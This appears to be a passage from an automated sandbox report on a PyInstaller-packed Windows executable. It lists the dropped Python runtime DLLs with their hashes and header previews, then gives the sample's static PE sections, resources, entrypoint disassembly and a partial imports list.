                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........._~.._~.._~..V.S.M~.....]~.....[~.....W~.....S~.._~...~......T~..J....~..J...7}..J...^~..J.?.^~..J...^~..Rich_~..........................PE..d......f.........." ...(..7..<......v........................................0P.......O...`...........................................H.0.....O.@....@O.|.... L. .....O../...PO.$...`{D.8............................yD.@.............O..............................text.....7.......7................. ..`.rdata........7.......7.............@..@.data...Ao....K..<....K.............@....pdata....... L.......K.............@..@.idata...%....O..&....N.............@..@.00cfg..u....0O.......N.............@..@.rsrc...|....@O.......N.............@..@.reloc..~....PO.......N.............@..B................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\libffi-8.dll

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):39696
                                                                                                                                                                                                                          Entropy (8bit):6.641880464695502
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:NiQfxQemQJNrPN+moyijAc5YiSyvkIPxWEqG:dfxIQvPkmoyijP7SytPxF
                                                                                                                                                                                                                          MD5:0F8E4992CA92BAAF54CC0B43AACCCE21
                                                                                                                                                                                                                          SHA1:C7300975DF267B1D6ADCBAC0AC93FD7B1AB49BD2
                                                                                                                                                                                                                          SHA-256:EFF52743773EB550FCC6CE3EFC37C85724502233B6B002A35496D828BD7B280A
                                                                                                                                                                                                                          SHA-512:6E1B223462DC124279BFCA74FD2C66FE18B368FFBCA540C84E82E0F5BCBEA0E10CC243975574FA95ACE437B9D8B03A446ED5EE0C9B1B094147CEFAF704DFE978
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".H...(.......L...............................................n....`......................................... l.......p..P...............P....l.../......,...@d...............................c..@............`.. ............................text....G.......H.................. ..`.rdata..h....`.......L..............@..@.data................b..............@....pdata..P............d..............@..@.reloc..,............j..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\libssl-3.dll

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):792856
                                                                                                                                                                                                                          Entropy (8bit):5.57949182561317
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:12288:7LN1sdyIzHHZp5c3nlUa6lxzAG11rbmFe9Xbv:7LgfzH5I3nlUa2AU2Fe9Xbv
                                                                                                                                                                                                                          MD5:4FF168AAA6A1D68E7957175C8513F3A2
                                                                                                                                                                                                                          SHA1:782F886709FEBC8C7CEBCEC4D92C66C4D5DBCF57
                                                                                                                                                                                                                          SHA-256:2E4D35B681A172D3298CAF7DC670451BE7A8BA27C26446EFC67470742497A950
                                                                                                                                                                                                                          SHA-512:C372B759B8C7817F2CBB78ECCC5A42FA80BDD8D549965BD925A97C3EEBDCE0335FBFEC3995430064DEAD0F4DB68EBB0134EB686A0BE195630C49F84B468113E3
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l.>..|m..|m..|m.u.m..|m+.}l..|m.u}l..|m+..l..|m+.xl..|m+.yl..|m..}l..|m..}m..|m..xl..|m..|l..|m...m..|m..~l..|mRich..|m................PE..d......f.........." ...(.>..........K........................................0......!+....`..........................................x...Q..............s.... ...M......./......d...p...8...............................@............................................text....<.......>.................. ..`.rdata..hz...P...|...B..............@..@.data...qN.......H..................@....pdata..pV... ...X..................@..@.idata...c.......d...^..............@..@.00cfg..u...........................@..@.rsrc...s...........................@..@.reloc..C...........................@..B........................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\pyexpat.pyd

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):201496
                                                                                                                                                                                                                          Entropy (8bit):6.37966632089213
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3072:gLWGOBH4P4xPmoeIUBEfZp6fcZW9i4pBgSdQn5UbLiiZcAAn7FJX7r5IvLh8N:1BH4PkPmoeIUKfZp6fceqmQ5U4Nr/
                                                                                                                                                                                                                          MD5:B34CA0FCD5E0E4F060FE211273AC2946
                                                                                                                                                                                                                          SHA1:F7E978EB8ADDA4BF74739EF71901E0E3AA12EA8C
                                                                                                                                                                                                                          SHA-256:B6670D91A76E9F00609752AB19AAE0B1EBE00D24D9D8D22068989BBB24D0AA44
                                                                                                                                                                                                                          SHA-512:010774770DD5C4355C336ECE7BFB729D2E616BBA62BFB9961324D3B314396F1F535B5ADF50621BFC0517C03587C912568E19602173A43F297A5F638AA9296500
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P..P..P..(t..P.....P.....P.....P.....P....P.(..P..P.P....P....P.....P....P.Rich.P.........PE..d....g.f.........." ...)............p........................................ ......s.....`.............................................P................................/..........`4..T........................... 3..@............ ...............................text............................... ..`.rdata...... ......................@..@.data...p ..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\python3.dll

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):68376
                                                                                                                                                                                                                          Entropy (8bit):6.149720380115211
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:XV1EbYGVXq6KC/prVHBN0cW18itCQDFPnOMFn+gikF/nFX14uewjBcCCC0yamM/c:XDmF61JFn+/Oi5IvL0b7Sykxr
                                                                                                                                                                                                                          MD5:2E2BB725B92A3D30B1E42CC43275BB7B
                                                                                                                                                                                                                          SHA1:83AF34FB6BBB3E24FF309E3EBC637DD3875592A5
                                                                                                                                                                                                                          SHA-256:D52BACA085F88B40F30C855E6C55791E5375C80F60F94057061E77E33F4CAD7A
                                                                                                                                                                                                                          SHA-512:E4A500287F7888B1935DF40FD0D0F303B82CBCF0D5621592805F3BB507E8EE8DE6B51BA2612500838D653566FAD18A04F76322C3AB405CE2FDBBEFB5AB89069E
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%?..a^e.a^e.a^e.).m.`^e.).e.`^e.)..`^e.).g.`^e.Richa^e.........PE..d....g.f.........." ...)............................................................'.....`.........................................`...H................................/..............T............................................................................rdata..............................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\python312.dll

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):6916376
                                                                                                                                                                                                                          Entropy (8bit):5.766275790250782
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:49152:YeceS1L2qpQvgBciWdyVahNTjy8VtvUt1wX/n8gRymPMVTBl2XhXNtMH2lt6cSA/:+RzBHWwuVGij3vwHDMiEHtSzW
                                                                                                                                                                                                                          MD5:B243D61F4248909BC721674D70A633DE
                                                                                                                                                                                                                          SHA1:1D2FB44B29C4AC3CFD5A7437038A0C541FCE82FC
                                                                                                                                                                                                                          SHA-256:93488FA7E631CC0A2BD808B9EEE8617280EE9B6FF499AB424A1A1CBF24D77DC7
                                                                                                                                                                                                                          SHA-512:10460C443C7B9A6D7E39AD6E2421B8CA4D8329F1C4A0FF5B71CE73352D2E9438D45F7D59EDB13CE30FAD3B4F260BD843F4D9B48522D448310D43E0988E075FCB
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........>._..._..._......_....|.._......_......_......_...'..._...'..._..._...^.....B_......_....~.._......_..Rich._..................PE..d....g.f.........." ...)..'...B......h.......................................Pj......"j...`..........................................<N.......O.......h......._.8J...Zi../....h..Z..0u2.T....................qH.(....s2.@.............(..............................text.....'.......'................. ..`.rdata...0'...(..2'...'.............@..@.data....H...@O.......O.............@....pdata..8J...._..L....^.............@..@PyRuntimh.....a.......`.............@....rsrc.........h.......g.............@..@.reloc...Z....h..\....g.............@..B................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\select.pyd

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):31000
                                                                                                                                                                                                                          Entropy (8bit):6.555355105424351
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:TRVBP9tKLhuosHfwTgDo90Y5IvQGsHQIYiSy1pCQzpuKAM+o/8E9VF0Ny33H:5FyMHfv2H5IvQGW5YiSyvIKAMxkEtH
                                                                                                                                                                                                                          MD5:7E871444CA23860A25B888EE263E2EAF
                                                                                                                                                                                                                          SHA1:AA43C9D3ABDB1AABDA8379F301F8116D0674B590
                                                                                                                                                                                                                          SHA-256:DCA5E6D39C5094CE599143CB82F6D8470F0C2A4CE4443499E73F32ED13333FD0
                                                                                                                                                                                                                          SHA-512:2E260D3123F7CA612901513B90FE40739E85248DA913297D4CCA3B2EBD398D9697880D148830E168E474EBFC3D30EDE10668C7316ED7668F8B39DA7BCA59E57D
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........tV..'V..'V..'_.j'T..'F:.&T..'F:.&R..'F:.&^..'F:.&Z..'.;.&T..'V..'...'...&S..'.;.&W..'.;.&W..'.;.'W..'.;.&W..'RichV..'................PE..d....g.f.........." ...).....2......................................................fT....`..........................................@..L...<A..x....p.......`.......J.../......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data...`....P.......8..............@....pdata.......`.......:..............@..@.rsrc........p.......>..............@..@.reloc..L............H..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\ucrtbase.dll

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):992960
                                                                                                                                                                                                                          Entropy (8bit):6.640654490481244
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24576:idX8vuNxBoVnCBuwJBNMsSLvZCRX3fp8Ri8dmxvSZX0ypnBl:g+quw5pKZC9l8HBl
                                                                                                                                                                                                                          MD5:60606071BF033275377FD66A2A7DE09C
                                                                                                                                                                                                                          SHA1:2475CDFD25427BE07B3662E99C185CC49DF35C6E
                                                                                                                                                                                                                          SHA-256:4EACE6C996A2ED322BD43810DB9FB64E20114682F4B71FCD4031215F803F5F47
                                                                                                                                                                                                                          SHA-512:BF9FBE3D162388BE71D866A818F0F583FFB479FA151E62125FF200D40902E6AB1E61822E85CA01C319A1304FD899390ECC7D9BA3B3B061EAC84CD23D644B699E
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c...'.a.'.a.'.a.'.`..a.......a..6..&.a.l..&.a.l....a.l..q.a.l....a.l..k.a.l..&.a.l..&.a.Rich'.a.........................PE..d...w.NV.........." .........Z......`........................................@............`A.........................................O......P$....... .......p..x........<...0..........8...........................0...................P............................text............................... ..`.rdata...z.......|..................@..@.data....$...@......."..............@....pdata..x....p.......2..............@..@.rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\unicodedata.pyd

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1138456
                                                                                                                                                                                                                          Entropy (8bit):5.4617453207817395
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:12288:FrEHdcM6hbaCjJ43w9hIpCQvb0QN8MdIEQ+U2BNNmD+99FfcQoC:FrEX/Cjfk7bPNfv42BN6yzUQoC
                                                                                                                                                                                                                          MD5:098CC6AD04199442C3E2A60E1243C2DC
                                                                                                                                                                                                                          SHA1:4C92C464A8E1E56E1C4D77CD30A0DA474A026AAF
                                                                                                                                                                                                                          SHA-256:64A162D6B11BA10CB11509F3CC445F17BEB7ACFD064F030B4D59FAA1C9894B29
                                                                                                                                                                                                                          SHA-512:73C28488B42A0BC2F0D2861FED3F5DCCCF8959CE19D3121C13C998DB496F2822DEB40F36F86240C8D3954FD2DC2BA5D63C8A125B62324DCD92FB6C8BA49FF170
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................(.....(.....(.....(.....)................).....).....)x....)....Rich..........................PE..d....g.f.........." ...).@..........0*.......................................p......U.....`.........................................p...X............P.......@.......0.../...`......P^..T............................]..@............P..p............................text....>.......@.................. ..`.rdata..\....P.......D..............@..@.data........ ......................@....pdata.......@......................@..@.rsrc........P.......$..............@..@.reloc.......`......................@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1835008
                                                                                                                                                                                                                          Entropy (8bit):4.465604975916049
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:6144:+IXfpi67eLPU9skLmb0b4PWSPKaJG8nAgejZMMhA2gX4WABl0uNldwBCswSbt:TXD94PWlLZMM6YFHf+t
                                                                                                                                                                                                                          MD5:3824E1A1246624A93EC99E14F3E7ABAA
                                                                                                                                                                                                                          SHA1:F6200D862E1DBEDDDC1E60BA4757185F776EC91A
                                                                                                                                                                                                                          SHA-256:BDF6224C0D21538A8BE2CDA969A4F5E5A9DECC9BCA6A8E637604E32E04A95A47
                                                                                                                                                                                                                          SHA-512:3437D300E3997BA38487B8406A6FD15AE9E8E96925549C5993EEFF2DF259C051EF81C41B1AEF1AA797E8202B45A3CF47B2D4C3E6D82173E10C471BC989EF3759
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..[..[..............................................................................................................................................................................................................................................................................................................................................|9L)........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          Static File Info

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                          Entropy (8bit):7.9960498818233
                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                          • Win64 Executable GUI (202006/5) 77.37%
                                                                                                                                                                                                                          • InstallShield setup (43055/19) 16.49%
                                                                                                                                                                                                                          • Win64 Executable (generic) (12005/4) 4.60%
                                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.77%
                                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.77%
                                                                                                                                                                                                                          File name:DChOtFdp9T.exe
                                                                                                                                                                                                                          File size:17'118'166 bytes
                                                                                                                                                                                                                          MD5:8ee41e146f682cfed19648f1ccb68bfa
                                                                                                                                                                                                                          SHA1:a49dc5ca5ac1cd8311a04804aed8d57c572974a2
                                                                                                                                                                                                                          SHA256:bf1b7e92893315f4c17394356ff7418fb6ef80a8cfc8e43d7905e8f2230fb77e
                                                                                                                                                                                                                          SHA512:c68c10e709feb5592d1583b33d1d9d9c697d4c80e46339e790946f3941b0622e334883e04f6c627d8e2e4f27a60bbc805020125b2d2bdc778c6ad612088c4645
                                                                                                                                                                                                                          SSDEEP:393216:E9YiR/Um2a63hucsXMCHWUjPodaI8CKh1UlLT5aQsP:E9YiRsmW3hrsXMb8PDINKhW
                                                                                                                                                                                                                          TLSH:F907335AA96110EBEDFB45368AF686164263BC181760CE9F43F675231E330D61E3CF62
                                                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........#VhcpVhcpVhcp..`qQhcp..fq.hcp..gq\hcp...pUhcp..`q_hcp..gqGhcp..fq~hcp..bq]hcpVhbp.hcpE.gqOhcpE.aqWhcpRichVhcp...............

                                                                                                                                                                                                                          File Icon

                                                                                                                                                                                                                          Icon Hash:0d098ea7331b8f07

                                                                                                                                                                                                                          Static PE Info

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Entrypoint:0x14000be20
                                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                                                          Imagebase:0x140000000
                                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                          Time Stamp:0x6745D0F5 [Tue Nov 26 13:45:25 2024 UTC]
                                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                                          OS Version Major:5
                                                                                                                                                                                                                          OS Version Minor:2
                                                                                                                                                                                                                          File Version Major:5
                                                                                                                                                                                                                          File Version Minor:2
                                                                                                                                                                                                                          Subsystem Version Major:5
                                                                                                                                                                                                                          Subsystem Version Minor:2
                                                                                                                                                                                                                          Import Hash:2ac23c52e7647c5bbea38e98bb68c652

                                                                                                                                                                                                                          Entrypoint Preview

                                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                          sub esp, 28h
                                                                                                                                                                                                                          call 00007F4A04C9DBECh
                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                          add esp, 28h
                                                                                                                                                                                                                          jmp 00007F4A04C9D80Fh
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                          sub esp, 28h
                                                                                                                                                                                                                          call 00007F4A04C9DFB8h
                                                                                                                                                                                                                          test eax, eax
                                                                                                                                                                                                                          je 00007F4A04C9D9B3h
                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                          mov eax, dword ptr [00000030h]
                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                          mov ecx, dword ptr [eax+08h]
                                                                                                                                                                                                                          jmp 00007F4A04C9D997h
                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                          cmp ecx, eax
                                                                                                                                                                                                                          je 00007F4A04C9D9A6h
                                                                                                                                                                                                                          xor eax, eax
                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                          cmpxchg dword ptr [000376DCh], ecx
                                                                                                                                                                                                                          jne 00007F4A04C9D980h
                                                                                                                                                                                                                          xor al, al
                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                          add esp, 28h
                                                                                                                                                                                                                          ret
                                                                                                                                                                                                                          mov al, 01h
                                                                                                                                                                                                                          jmp 00007F4A04C9D989h
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                          sub esp, 28h
                                                                                                                                                                                                                          test ecx, ecx
                                                                                                                                                                                                                          jne 00007F4A04C9D999h
                                                                                                                                                                                                                          mov byte ptr [000376C5h], 00000001h
                                                                                                                                                                                                                          call 00007F4A04C9D0E5h
                                                                                                                                                                                                                          call 00007F4A04C9E3D0h
                                                                                                                                                                                                                          test al, al
                                                                                                                                                                                                                          jne 00007F4A04C9D996h
                                                                                                                                                                                                                          xor al, al
                                                                                                                                                                                                                          jmp 00007F4A04C9D9A6h
                                                                                                                                                                                                                          call 00007F4A04CAACFFh
                                                                                                                                                                                                                          test al, al
                                                                                                                                                                                                                          jne 00007F4A04C9D99Bh
                                                                                                                                                                                                                          xor ecx, ecx
                                                                                                                                                                                                                          call 00007F4A04C9E3E0h
                                                                                                                                                                                                                          jmp 00007F4A04C9D97Ch
                                                                                                                                                                                                                          mov al, 01h
                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                          add esp, 28h
                                                                                                                                                                                                                          ret
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          inc eax
                                                                                                                                                                                                                          push ebx
                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                          sub esp, 20h
                                                                                                                                                                                                                          cmp byte ptr [0003768Ch], 00000000h
                                                                                                                                                                                                                          mov ebx, ecx
                                                                                                                                                                                                                          jne 00007F4A04C9D9F9h
                                                                                                                                                                                                                          cmp ecx, 01h
                                                                                                                                                                                                                          jnbe 00007F4A04C9D9FCh
                                                                                                                                                                                                                          call 00007F4A04C9DF2Eh
                                                                                                                                                                                                                          test eax, eax
                                                                                                                                                                                                                          je 00007F4A04C9D9BAh
                                                                                                                                                                                                                          test ebx, ebx
                                                                                                                                                                                                                          jne 00007F4A04C9D9B6h
                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                          lea ecx, dword ptr [00037676h]
                                                                                                                                                                                                                          call 00007F4A04CAAAF2h

                                                                                                                                                                                                                          Data Directories

                                                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x3b67c0x78.rdata
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x480000x19a04.rsrc
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x450000x21c0.pdata
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x620000x768.reloc
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x38d800x1c.rdata
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x38c400x140.rdata
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x2a0000x440.rdata
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                          Sections

                                                                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                          .text0x10000x28f600x29000de5b7deeb13436557c4ba84aa3d5b3fbFalse0.5521805926067073data6.482403760023359IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                          .rdata0x2a0000x125100x12600811c2ae4328dc8cd01ab200a32011a5eFalse0.5267325680272109DIY-Thermocam raw data (Lepton 2.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 33554432.000000, slope 8.0192875.760805036098361IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                          .data0x3d0000x73c80xe008013c58834a08435a779ff436ff10eb7False0.134765625data1.8346765722623417IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                          .pdata0x450000x21c00x2200d16e38966953c987eb484ac72e115d6cFalse0.48678768382352944data5.427654805721976IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                          .rsrc0x480000x1a0000x19c00cb5fdc6bf627c2b091f13f6e2e8c020dFalse0.5083150030339806data6.981894463244789IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                          .reloc0x620000x7680x800be4464056c7d34453c1e26c7294816eeFalse0.556640625data5.2849802082305075IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                          Resources

                                                                                                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                          RT_ICON0x482080x7773PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedChineseChina0.9949965662709703
                                                                                                                                                                                                                          RT_ICON0x4f97c0x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016ChineseChina0.25225982762245114
                                                                                                                                                                                                                          RT_ICON0x58e240x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896ChineseChina0.3050307038261691
                                                                                                                                                                                                                          RT_ICON0x5d04c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600ChineseChina0.3629668049792531
                                                                                                                                                                                                                          RT_ICON0x5f5f40x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224ChineseChina0.48592870544090055
                                                                                                                                                                                                                          RT_ICON0x6069c0x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400ChineseChina0.6155737704918033
                                                                                                                                                                                                                          RT_ICON0x610240x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088ChineseChina0.7092198581560284
                                                                                                                                                                                                                          RT_GROUP_ICON0x6148c0x68dataChineseChina0.7692307692307693
                                                                                                                                                                                                                          RT_MANIFEST0x614f40x50dXML 1.0 document, ASCII text0.4694508894044857

                                                                                                                                                                                                                          Imports

                                                                                                                                                                                                                          DLLImport
                                                                                                                                                                                                                          USER32.dllCreateWindowExW, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
                                                                                                                                                                                                                          COMCTL32.dll
